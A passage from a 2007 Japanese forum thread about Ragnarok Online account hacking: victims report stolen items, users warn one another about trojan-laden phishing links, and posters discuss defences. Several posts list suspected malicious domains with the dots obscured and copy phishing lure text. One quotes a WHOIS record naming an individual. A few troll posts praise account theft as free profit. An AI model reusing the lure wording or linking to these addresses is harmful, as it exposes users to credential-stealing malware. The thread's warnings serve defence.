【 　 　ツールの使用の有無　 　 　 】 (No)
【　 ネットカフェの利用の有無　 　　】 (Yes)
【　 　　 OS　 　 】 (WINDOWS　XP　home　SP2　WINDOWS　UPDATA最新)
【使用ブラウザ 】 (IE6)
【WindowsUpdateの有無】 (3月19日)
【　アンチウイルスソフト 】 (avest)
【その他のSecurty対策 】 (なし)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでTrojan-PSW.W32発見
【スレログやテンプレを読んだか】 (今から読みます)
【説明】
ログイン中に別の場所でのログインがされました。と表示されて
強制ログアウト。
その後パスワードを急いで変更しましたが７〜８分後にログイン出来たときには
裸で違うまMAPにいました。アイテムは全部根こそぎやられました。

メインキャラはキャラパスも変更されてる状態です。

165 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 16:42 ID:GWzNojBo0

報告おつ。先日ではなく、明確な日時が有るとよかったな。
>>3のテンプレを埋めて下記のスレに書込んで欲しい。

セキュリティ対策、質問・雑談スレ
　http://enif.mmobbs.com/test/read.cgi/livero/1173878067

駆除方法、警察への届け出、今後掛からない予防などの話題はそちらで扱います。

166 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 16:51 ID:FQDZfBbe0

パス変える前に急いでログインしなおしたほうがよかったんじゃないか？
とはいえ相手も準備してて一瞬でアイテム移動できる状況にしてあるだろうし難しいかもな

167 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 16:51 ID:Hf2VvQEm0

>>163のようなまさに垢ハク現場に直面した時って、ログイン合戦しつつ
ID、パス変えるしか手段ないのかな？
でも、マシン1台しか持ってなかったりすると、変えた情報も当然送られてる
から無駄か・・・。

168 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 16:53 ID:GWzNojBo0

>>166-167
移動よろ

169 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 17:02 ID:EAjpGLP30

ログイン合戦をしつつ･･･

・友人等に頼める場合は、緊急避難的にID、パスを教えて変えてもらう。
・PC2台以上ある場合は、他のPCは感染していないことを祈ってそっちで変える。
・PC1台のみの場合は、まずは裏作業で変えて数秒でもログインを遅らせ、
ウィルスチェックしつつ、数秒単位でID/パスを変え続ける。

相手が全く作業出来ほどのログイン合戦が大前提だけど、こんな感じでどうだ。

170 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 17:31 ID:GWzNojBo0

>>169
163-164は既に移動済み。

171 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 17:47 ID:T4qqV3IG0

特殊な事例だけど、被害に遭遇した人が最善手を打てるように対応手順を検討してみるか。

172 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 18:18 ID:k7/3P6cY0

キーロガーでIDパス盗まれる場合、単語登録であいでぃ→ID　ぱす→passで変換出来るようにした方がいいんだろうか
ログイン合戦も素早く対応出来るけど、キャラパス抜けられるってことはSS送られてるってことだし意味なさそうだが・・・

173 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 18:32 ID:sACPDERj0

いつもの福建人が取得したドメイン
はてなの錯誤狙い？
こっちの郵便番号は福建省(FJ : fujian)竜岩市(ly : longyan)の正規番号。
前のは四川省成都市だったね。

Domain Name ..................... ahatena■com
Registrant Name ................. lin zhiqiang
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 364000
Registrant Country Code ......... CN

174 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 18:38 ID:GWzNojBo0

>>171
だから対処方法の相談に乗るのははLiveROだってば。

>>172
無意味。雑談はLiveRO推奨。

175 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 18:58 ID:7hPBRGW70

相手にしなければ良いと思うんだが。
こんな自治だけの書込みを見るとウザく感じる人もいる訳で。
逆に荒らしを呼ぶ要因になる可能性がある事も自覚しないと拙いと思う。

176 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 19:27 ID:GWzNojBo0

>>175
了解。でも、一言で済んだので172への回答もつけたりしてますよん。

そして既出だったらごめんなさい、見覚えなかったので貼り。これも某調査隊BBSより。


Re :
--------------------------------------------------------------------------------
詳しくは:ttp://www■ahatena■com/897656/

177 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 19:36 ID:GWzNojBo0

>>323
相談は、どの相談者に対しても、取るべき手段は殆ど同一であることから、何度も繰り返されることになる。

故に、「対策・相談・雑談は>>2に有る雑談スレを利用して下さい。 」というのが本スレのテンプレに入っている。
そうしないと必要な情報が埋まるから。

だけど、よく読むと、「垢ハック」の相談は本スレでも可。一般的なものになったらLiveROということなんだな。
自分の認識が間違ってたみたいなので、修正しとく。

だけど、駆け込み寺扱いはこっちの方がよくて、必要な情報が固まったらまとめとして本スレに転記という形で
収まったと思っていたんだけど、その辺は意識の差があるね。どっちのが利用者の役に立つんだろう。
MMOBBS/Ragnarok板の方ではTOPの誘導をこっちにという話もあるし、その決定次第で棲み分けが決まるかもな。

178 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 19:36 ID:GWzNojBo0

あ゛…ごめんなさい。LiveROに書込む予定のを誤爆しました。orz

179 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 19:46 ID:6lVs43i20

http://sippou2006■blog60■fc2■com

mixiで無差別に貼り付けられてるfc2の個人のブログなのですが、
"勇気がなくて踏めない人のための鑑定ｽﾚPart13"で二回ほど
質問された様子だけど、片方がウイルスがあったと、
片方が無害と出ているんだけどどっちが正当なんだろう。

とりあえずは君子危うきに近寄らずということで踏まないように
お気をつけください。

180 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 19:55 ID:1gAnRRvN0

LiveROにはアカハックスレなんて無いぞ。

181 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 20:39 ID:uzTgJ0GO0

>>180
それがお前の限界……
こしてこれが、俺の応用（進化）だ!!!

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi?bbs=livero&key=1173878067

182 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 20:58 ID:5XVdnTcW0

こして

183 ：(^ー^*)ノ〜さん sage ： 2007/03/23(金) 21:02 ID:oSH7YvXe0

事前措置ならブラウザのスクリプトやJavaやActiveXのオフとかあるけど
感染する人は基本的にそういうの全部オンにしてるよなあ。
さらにウィルス監視ソフトなり入ってない状態だとぶっちゃけ感染してくださいって言ってるようなもんだし。

数分で裸って手際じゃ対処はまず無理じゃなかろうか。

184 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 01:10 ID:r81oJvtS0

転ばぬ先の杖的手法としては、IE7への乗換えも一つの方法。
アップデート後に設定関係をリセットすれば、IE6SP2を使い続けるよりは、遥かに安全性の高まった環境にはなる。
これはあくまで、IE以外への移行に敷居が高く感じられる対象向けではあるけど。

185 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 06:19 ID:H6ZDcL3D0

ちょっと強引なやり方だけど、サイトのトップページとかにJavaScript埋め込んで、
ブラウザの種類とバージョン見て、アップデートをしてくださいとか、別のブラウザを使ってくださいとかを、
表示させるってのはどうだろう?

186 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 10:16 ID:GRsRDBwL0

JS切ってたらバージン云々ってメッセージ出ないがな

187 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 10:17 ID:GRsRDBwL0

× バージン
○ バージョン

iとo間違えて押してた｡･ﾟ･(ﾉД`)･ﾟ･｡

188 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 10:21 ID:zv5RAaRJ0

そうか、処女か

189 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 10:47 ID:ur5kC7AF0

どうすれば雑談なくなる？

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067

190 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 10:54 ID:dU81x8Aq0

ぶっちゃけた話だけど
個人的には分ける意味は皆無だったんじゃないかと思ってる

191 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 10:55 ID:D0eZC4KH0

提案はできても禁止はできんよ。
それに俺も無理に分ける必要性は感じない。

192 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 10:59 ID:FFdiwtcT0

カリカリすんな。
そういや向こうは「セキュリティ対策、質問」なのに「雑談」までタイトルに入れられているんだなぁ。
わざわざそうする事に悪意を感じるね^^；

|　 |∧_∧
|＿|´・ω・`)みなさん、 お茶ですよ
|梅| ｏ　o旦
|￣|―ｕ'

193 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 11:04 ID:4Dyb/Vw00

>>190>>191

まとめサイトの人（>>107）の抽出作業の助けになっているだけでも
分ける必要性を感じる

194 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 11:09 ID:u18SJgCQ0

無理に分けようとする自治厨の書き込みの方が目立つ罠
誘導するなとは言わんが、もう少し書き込む頻度落としなさい

195 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 11:28 ID:D0eZC4KH0

そんだけ抽出しにくいならいっそ報告だけのスレ立てれとは思う。
ここ対策の話題もあるからどうやったってノイズ混ざるし。

196 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 11:38 ID:dU81x8Aq0

抽出しにくいってのは目的と手段が逆になってる気がするんだが
話題が混じるからこそ抽出する必要があるんであって
その話だけなら抽出する必要はなくなる、それこそログ嫁で片付いちゃうし

197 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 11:51 ID:guK7FUgI0

とりあえず「総合」って名前はやめないと、わかれようがないだろ
「総合」って名前なのに内容を「限定」しようとしたって、そりゃ厳しいんじゃないか

198 ：(^ー^*)ノ〜さん ： 2007/03/24(土) 12:23 ID:chR+aFzg0

なんていうか、まあどっちでやってもかまわないとは思うんだが、
スレの今後の方向性とかについてはLiveROのほうで活発に
議論されてるからそっちでやらないか。

本音？本音は>190氏と同じだけどさ。
あと、不要なのを別のどこかへ分けるって発想じゃなくて、
重要なのをどこか別のところへ分けておくって発想もアリなんじゃないかと思ってる。

199 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 12:23 ID:chR+aFzg0

下げ忘れましたごめんなさい｡･ﾟ･(ﾉ∀`)･ﾟ･｡

200 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 12:32 ID:FxPXI6DJ0

>>180-200
さぁ、LiveROのスレに帰るぞ。スレ使い分けの話題はあっちでやってる。
まとめサイトの人が楽になるように協力しようや、な。

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067

201 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 12:35 ID:ITC5wkpF0

>>163-169 で癌への要望思いついた。
ログイン合戦になったらアカウントロックして、
アトラクションセンターでのパス変更までロック解除しないようにすればマシになる気がする。
てかログイン中別の場所でのログインがあった時点でロックしておけば合戦しなくてもいいような。
……癌にこういう内容で一応要望送ってみる。実現されるかどうかはｼﾗﾈ

202 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 13:00 ID:C5cWfw9i0

やぁ。元気にハックされてるかい？
まだの人は手っ取り早く社会復帰するために被ハック推奨だよ！

203 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 13:02 ID:gOCEJgzr0

>>200
別にここはURLを書き綴るだけのスレじゃねぇよ。
それだけをしたいんだったら、それを明確にしたスレを立ててそっちでやってくれ。

204 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 13:54 ID:D0eZC4KH0

分ける、分けないはともかくとして
周りの意見も聞く前から分けようって方向なのは変だね。
必要ないだろ、って人がいるのにそれ無視してまで押し通す必要はないだろう。

205 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 13:59 ID:D0eZC4KH0

ハックアドレス抽出しやすくってことならLIVEROあたりに報告スレ分けるほうがいいとは思うんだけどね。
スレ内のアドレスは危ないってのが明確になるしハックアドレス収集も楽になる。
捏造や勘違いもありえるからそのアドレスの検証も込みくらいにしとけば住み分けにはなると思う。

でもまあ無理に分ける必要は感じない。

206 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 14:00 ID:0gvriBKE0

初級ネットの勇気がなくて踏めないURLに鑑定お願いしたらいいと思う

207 ：(^ー^*)ノ〜さん age ： 2007/03/24(土) 14:19 ID:Cb7wcV9s0

分ける必要感じない人→ここに多い
分けること前提で住み分けのライン考えてる人→LiveROに多い
という現状にみえてくるんですが、とりあえず「今使ってるスレの」テンプレには
>アカウントハックに関する情報の集積・分析を目的とするスレです。
>被害や攻撃等のアカウントハックの具体的事例に関して扱います。
>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。
とありますし、>>203の言うとおりここは「URLだけを書き綴るスレ」ではありませんが
スレ分割の話は比較的雑談ぽいですしログも流れますし、雑談スレあるのにわざわざここでする必要もないと思うんです。

なのでLiveROに移動しませんかー

主にLiveRO/是非スレでこの話してた者なのですが、実際に分割されて立ったあと住み分けの話をしていたのはLiveROでして
そちらに「必要ないだろ派」があまり見受けられなかったが故に無視して押し通したみたいになってるかもしれません。すみません。

もし移動に同意して頂ける様だったらこの書き込みへのレスもLiveROのほうでお願いできれば･･･

208 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 14:53 ID:GnhWzErj0

そういう自分の書きたいことだけ書いて他人はダメというのがまずいんじゃないかな。
このスレの方向性に関することはこのスレに書くべきだと思ってる人もいると思うし。
>>1にもある具体的事例を書いても、スレ違いだと言い張る一部の人がいるから
ｇｄｇｄになってしまってるんでしょ？

この書き込みへのレスもLiveROのほうでお願いします。

209 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 15:03 ID:lALl9ilG0

垢ハックうめぇｗ元手ゼロの丸儲けｗｗｗ

210 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 15:06 ID:7Bi89NxR0

>>209
釣りのﾂﾓﾘ? 実際ｱﾅﾀがやったのでないとしても、その書き込みで
ｱﾅﾀやったことになってしまいました。ﾂｰﾎｰですよ。乙

211 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 15:16 ID:lALl9ilG0

ツーホー乙ｗｗ

212 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 15:16 ID:lALl9ilG0

↓次どうぞ↓

213 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 15:18 ID:yDXoEDWq0

>>ID:lALl9ilG0
まあ実際捕まりゃせんだろうけど、こういうカンチガイ野郎は
捕まって欲しいとは思うね。中華は捕まらんだろうから、国内
協力者辺りとして。

214 ：(^ー^*)ノ〜さん ： 2007/03/24(土) 16:32 ID:kikPreuNO

♂アコファックうめぇｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

215 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 16:39 ID:EORrPy1n0

自治厨が即降臨してたし荒れるとは思ったが、やはりこの流れか

216 ：(^ー^*)ノ〜さん ： 2007/03/24(土) 17:31 ID:c9G5px2F0

質問です。アサシンテンプレを見ていたらどうやら垢ハックウィルスに書き換えられてたページ
（青の何も書いていないページ）を踏んでしまったようです。
セキュリティソフトがすぐに反応して、遮断したそうなのですが、再インスコなどはしなくても大丈夫ですか？
あまりこういうのに詳しくないので教えていただけるとありがたいです；

217 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 17:46 ID:cAkVthC90

100%大丈夫などとは誰も言えないわけだが、遮断したって出てスキャンしても検出されないなら大丈夫じゃないの。
ていうか、それで不安なら再インスコオススメ。それが一番確実で安全な手段。

218 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 17:54 ID:vq2rHwnh0

>>216
反応したものに関しては除外できているから大丈夫。

疑りだすとキリがないけど、新型やウィルスパターン漏れでチェックに引っかからなかった
別のウィルスが感染してる可能性もある。
疑わしいと思ったら、OS再インストールしかないけど、過敏になりすぎてもそれこそネットに
繋ぐなとか言えないので、リンクを踏む場合にはURLを確認するしかない。

219 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 17:55 ID:c9G5px2F0

ありがとうございました；手元にOSがないため、今回はノートンががんばってくれた、と解釈します。
ちなみにアサWikiのTOPにあるMMOBBSのリンクが書き換えられてました。みなさま注意です。

220 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 19:27 ID:a0kA93t90

リンクは・・直したの？

221 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 20:32 ID:2dlaRwNK0

>>219
待避所のwikiだよね？

更新履歴の下のはMMOBBSトップ行きだし
一番下のも普通にここの「シフアサクロ情報交換スレ　279」だったんだが
どのリンクだったか記憶してたらお願い

216が直してたらすまない

222 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 20:46 ID:qx9sGRxB0

また自ブログにたどり着いた形跡があったのでご報告と思ったのですが
こちらに書いちゃって大丈夫かな…

リモートホスト
63.80.78.222.board.ly.fj.dynamic.163data.com.cn
検索語
「Ragnarok MMObbs」
今日の15時半前後のことでした。

223 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 20:54 ID:aQ5axgi00

>>180-223

LiveRO行け、目障りだ

224 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 20:55 ID:c9G5px2F0

すみません、頭がぱにくってて正確な場所を忘れてしまった&直し方がわかりません…

直ってたならよかったですが、mmobbsだかなんだかっていうアドレスだったと思います。

225 ：(^ー^*)ノ〜さん ： 2007/03/24(土) 22:11 ID:84IMH9NB0

EirGv評価スレに投下されてたハックアドと思わしきモノ↓
議論してBOSSの騎士を殴りますhttp://www■interzq■com/bbs/

EirZERO（廃）スレに投下されてたハックアドと思わしきモノ↓
はじめまして。剣士の詩避難所掲示板からの提案により、この度、剣士系個人Blogリンク集Wikiが発足しました。
サイトアドレスは　http://www■biglobe-ne■com/bbs/
B2HS様のサイトはリンクフリーと書かれておりますが、リンク集に加えさせていただこうと事後ではありますが報

告に参りました。
尚、問題が有る場合はここにて返答していただけるか、Wiki内の雑談掲示板に書き込んでいただければすぐに対処

させていただきます

----------------------------------------------------

踏んじゃあいないが、日本語おかしいしまず垢ハックと見ていいと思うので報告

226 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 22:14 ID:RTFUR7w30

　　　　　　　,.ｨ , - ､.＿　　 　 、
.　　　 　 ,ｲ/ l/　　　 　 ￣￣｀ヽ!__
　　 　 ﾄ/ |'　{　　　　　　　 　 　 　 ｀ヽ.　　　　　　　　　　　 ,ﾍ
　 　 Ｎ│ ヽ. `　　　　 　 　 　 　 　 　 ヽ　　 　 　 　 /ヽ　/　 ∨
　　 N.ヽ.ヽ、　 　 　 　 　 　 ,　　　 　 　 }　　　　l＼/　　`′
.　　ヽヽ.＼　　　　 　 　 ,.ｨｲﾊ　　　　 　 |　　 ＿|
　　 ヾニｰ　__　_　-=_彡ｿﾉ u_＼ヽ、 　 |　　＼　　　　　　全ては
.　　 　 ￣ﾞr=<‐ﾓﾐ､ﾆr;＝=ｪ;ｭ＜_ゞ-=7´ヽ　　　>
.　　　　 　 l 　 ￣ﾘーh ｀ ｰ‐‐'　l‐''´冫)'./　∠__　焼き増し本を買わせる為の
　　　　　　 ﾞiｰ- ｲ'__　ヽ､..＿__ノ　　 ﾄr‐'　　　　/
　　　　　　　l　　 `＿__,.、 　 　 u　./│　　　　/＿　　陰謀なんだよ！！！
.　　　　　 　 ヽ.　 }z‐r--|　　 　 ／　 ﾄ,　　　 　 　 |　 ,、
　　　　 　 　 　 >､`ｰ-- '　　.／　 ／　|ヽ　　　　　l／　ヽ　　 ,ﾍ
　　　　　　_,.／| ヽ`ｰ--‐ _´.. ‐''´ 　 ./　 ＼､　　　　　　　＼/　ヽ/
-‐ '''" ￣ /　 :| 　 ,ゝ=＜　　　　　　/　　　 |　`'''‐-　､.._
　　　　　/　　 !.／l;';';';';';';＼　　　 ./　　　　│ 　 ＿
　 　 　 _,＞ '´|l. ﾐ:ゝ､;';';_/,´＼　 ./|._ , --､　|　i´!⌒!l　 r:,＝i
.　　 　 | 　 　 |:.l.　/';';';';';|=　　ヽ/:.|　.|l⌒ｌ ｌﾆ._ | ﾞｰ=':|　|. L._｣
　 　 　 l.　 　 |:.:.l./';';';';';';'!　 　 /:.:.| i´|.ｰ‐' | /　|　 　 |.　!　　 l
.　　　　 l.　　 |:.:.:.!';';';';';';';'|　　/:.:.:.:!.|"'|.　　 l'　 │-==:|.　!　==l　　 ,. -‐;
　　　　　l　　 |:.:.:.:l;';';';';';';';|　/:.:.:.:.:| i＝!ｰ=;: l　　 |　 　 l.　|　　 |　/ 　 //
　　 　 　 l　　|:.:.:.:.:l;';';';';';';'|/:.:.:.:.:.:.!│　l　 　 l、　:|　 　 |　}　＿|,.{::　　7
　 　 　 　 l　 |:.:.:.:.:.:l;';';';';'/:.:.:.:.:.:.:.:|　|__,.ヽ､__,. ヽ._｣ ｰ=:::ﾚ'　 ::::::|;　　 7
.　　　　　　l　|:.:.:.:.:.:.l;';';'/:.:.:.:.:.:.:.:.:.|.　＼:::::＼:::::　ヽ　 ::::::!′　:::| 　 .:/
.　　　　　　 ｌ |:.:.:.:.:.:.:∨:.:.:.:.:.:.:.:.:.:.:.! 　 /ヽ:::　`:::　　　　::::　　....::....／

227 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 22:19 ID:7TpnqkTE0

>>225
>>108に出てるやつだね
毎度おなじみ福建省

228 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 22:20 ID:7TpnqkTE0

下は初か・・・
でも、福建省＼(^o^)／

229 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 22:33 ID:a0kA93t90

下のも、vs ro hackのhostファイルには載ってるよ

230 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 22:36 ID:FxPXI6DJ0

載っていても注意喚起になるので報告GJ

231 ：(^ー^*)ノ〜さん ： 2007/03/24(土) 23:18 ID:Pq/ey81X0

>>223
オマエが目障りなんだよｗｗｗｗ
だから　>>180-223なんだよなｗｗなｗ
氏ぬといいよｗｗｗｗｗ

232 ：(^ー^*)ノ〜さん sage ： 2007/03/24(土) 23:43 ID:DzZQWLsJ0

>225
あああぁぁぁぁ・・・
使われてしまいましたかorz
自分の文章が使われると泣きたくなる　；ω；

233 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 00:50 ID:YTPCY9om0

アカハックを踏むとタスクマネージャのプロセスになんかへんなプログラムが表示されますか？
ＲＯ起動する前にタスクマネージャを毎回チェックしているんですが、無意味ですか？

234 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 01:05 ID:GdVEeEm50

>>223
基本的に無意味。

踏んじゃった人の相談はこっちでもOKだけど、質問関係はスレが分離されてる。
次からはそっちを使ってもらえるとありがたいかも。

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/

>>234
自治厨乙

235 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 02:01 ID:f5BAg3Fy0

>>233
既存のプロセスに取り付かれたり、検出不能なぐらい短い時間しか起動しなかったり、
プロセスではないもっと低レベルなもの（あまり詳しくないけどドライバとか？）
で動いたりしたら、アウトではあるけど、逆にそうでなければ検出できるわけだから、
意味はあるんじゃないかな。まあ不完全ではあるけど、そもそも完全な対策などないので。

ウィルス対策ソフトやＰＧ２も新種に対応できないという問題があるけど
不完全と分かってて導入するわけだからね。

ちなみにタスクマネージャの場合、実行ファイルがフルパスで表示されないという問題があるので、
フルパス表示可能なフリーのソフトを使う方が良いと思う。
ちなみに私は ProcessWalker (VECTORからダウンロード可) というソフトを使ってます。

ただプロセスを監視するのなら、目視では限界があるので、
自動で行ってくれるソフトの方がいいなあと思って今探している最中。何か良いのないかな。

236 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 02:15 ID:ZPed8PwV0

現在主流と思われるmaranを始めとして、オンラインゲームを標的としたトロイの挙動。
ttp://www.mcafee.com/japan/security/virG.asp?v=Generic%20LSP

・web上に仕掛けられているのはあくまでドロッパであり、トロイ本体ではない。
このドロッパが、実際のトロイの設置と、レジストリの改変を行う。
無論、実行ファイルであるから、プロセス一覧にもリストはされるが、一瞬であり目視で確認するのは不可能だろう。
・実際のトロイはLSPとして動作するので、WinsockからDLLとして呼ばれる形になる。
つまり、プロセス上でもWinsock本体しか見つけることは出来ない。

つまるところ、(Personal) FireWallなどで、問題地域への接続を検知し、ブロックする事が有効なのは揺るがない。

237 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 07:57 ID:wtQ5mcPF0

>>173のトラップは既に使われ始めている。
RO系掲示板で発見。
www■ahatena■com/388465/

238 ： ◆sp4Sh9QXGI sage ： 2007/03/25(日) 10:31 ID:urDwgAiF0

ahatena■comに対応しました。

239 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 13:11 ID:HA0psBoQ0

そうですかぁ。
ＲＯ起動する前にタスクマネージャを起動し、パス入力終わりログインするまで
目視で監視してましたが、難しいようですね。

240 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 14:05 ID:R7GJ9YWJ0

垢ハックってさ、ＲＯから抜け出すいい機会になると思うんだよね
された人は通報するのもいいけどそれを機にネトゲ辞めた方いいかと

241 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 14:27 ID:kA1qHPWn0

mixiもなんとか対応してくれんのかね？

242 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 14:37 ID:h7SvIpkx0

>>240
完全にスレ違い、さよなら

>>241
mixiの運営に相談・報告するしかないかも

243 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 15:20 ID:kA1qHPWn0

おｋ
今軽くまとめて送っておいた。

244 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 15:23 ID:CjkyscTW0

>>239
アンチウィルスソフトやFWとかで通信監視とかレジストリの監視のがまだいいかな。
プロセスに出るって時点でもうとっくにやばいことなってるし。
アカハックURLの多くは同じIPだからそれ遮断するのも手。

245 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 16:19 ID:TObcdn3Y0

便乗で質問。
引っかかった後、PG2が遮断してくれるなんてのは甘い考えですかね？

246 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 16:25 ID:dPOzNCyY0

運良く遮断リストに入っていたなら助かる可能性もあるけど、
当然そうじゃない場合もあるので気休め程度に考えた方がいい

たとえ遮断しても、実は複数のサイトにアクセスした内の一つだけを遮断した
とかあるかも知れないし、遮断したから安全と思ってしまう方が危険

247 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 22:54 ID:6A2RMBuL0

すみません、ちょいと質問なのですが
ＲＯプレイ中に垢ハクウィルスを踏んでしまった場合
もうそのプレイしているキャラのパスは抜かれてるのです？
それともｃｃやらでパス入力をしなければ抜かれない？
すみませんが宜しくお願いします

248 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 22:54 ID:oTgPRqqA0

何をよろしくするんだい？

249 ：(^ー^*)ノ〜さん sage ： 2007/03/25(日) 23:53 ID:jm2nlcMF0

>>247
>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

ということでLiveROの方いくといい。それくらいの質問ならあっちの過去レス読めば
解決する

250 ：(^ー^*)ノ〜さん sage ： 2007/03/26(月) 00:08 ID:i1sEm0FZ0

>>247
例外はあるということが前提で、抜かれていない。
早くスキャンしとけ。

251 ：(^ー^*)ノ〜さん sage ： 2007/03/26(月) 00:28 ID:HHkuA8Wc0

>>247
仮定の話しなら相談スレ行け。

踏んでしまったのなら、さっさと除去しろ。パスワード入力をしなければ、抜きようがない。
くれぐれも、その状態でブラウザからパスワード変更したりすんなよ。

252 ：(^ー^*)ノ〜さん sage ： 2007/03/26(月) 01:00 ID:Xktnh7x40

やっぱり総合対策スレという名前がまずい

253 ：241 sage ： 2007/03/26(月) 03:32 ID:JgXiwTC+0

しばらく更新してなかったからかもしれんが垢消されたorz

254 ：(^ー^*)ノ〜さん sage ： 2007/03/26(月) 12:27 ID:Irek7ZMn0

猫MAPでBOTに混じりながら狩りをしていました
暫くして狩をおえてチャットウインドウ（画面一番下の文字を入力するところ）
で↑を押してみると

www.ryobi_group.co.jp/powertools/products/item_detail.php?iti

と出ました

ここは過去自分が発言した履歴が出るはずで、自分は今回一度も
発言していません
これは垢ﾊｯｸでしょうか？

ﾂｰﾙ等はいっさいつかっていません。

255 ：(^ー^*)ノ〜さん sage ： 2007/03/26(月) 12:39 ID:OikNFlXZ0

釣りかと思ったら釣りではなかったな
パワーツール使い乙

256 ：(^ー^*)ノ〜さん sage ： 2007/03/26(月) 12:41 ID:Irek7ZMn0

いや　本当に何も使ってないんです
パワーツールというのもなにか知りませんし
そもそもなんでチャットウインドウにそのアドレスが出たか
わからないんです。

257 ：(^ー^*)ノ〜さん sage ： 2007/03/26(月) 13:00 ID:6/ycMYYA0

>>254

Shift+insでクリップボードに入っている文字列がペーストされる。
で、おまいさんはDIYでもやってるのかね?
ttp://www.ryobi-group.co.jp/projects/powertools/products/index.php
広島に本社があるDIY・ガーデン機器のページが引っかかったんだが。
(もちろん垢ハックとは関係ない)
発言してなかったら、誰かの発言でも拾ったのかもね。

258 ：(^ー^*)ノ〜さん sage ： 2007/03/26(月) 13:03 ID:ug3/SVg20

何だか知らんが、RO内で垢ハク仕込まれることはあり得ない。

259 ：(^ー^*)ノ〜さん sage ： 2007/03/26(月) 13:08 ID:HHkuA8Wc0

>>254
垢ハックではないので安心しろ。自分がクリップボードに入れてたものを貼り付けちまっただけだろ。
実際に踏んでしまった人の相談はこっちだが、判断できませんという場合はLiveROが担当なんで
次からはLiveROで頼む。

260 ：(^ー^*)ノ〜さん sage ： 2007/03/26(月) 13:19 ID:Irek7ZMn0

あー　いろいろ　申し訳ありませんでした
でも皆さんのおかげで安心できました
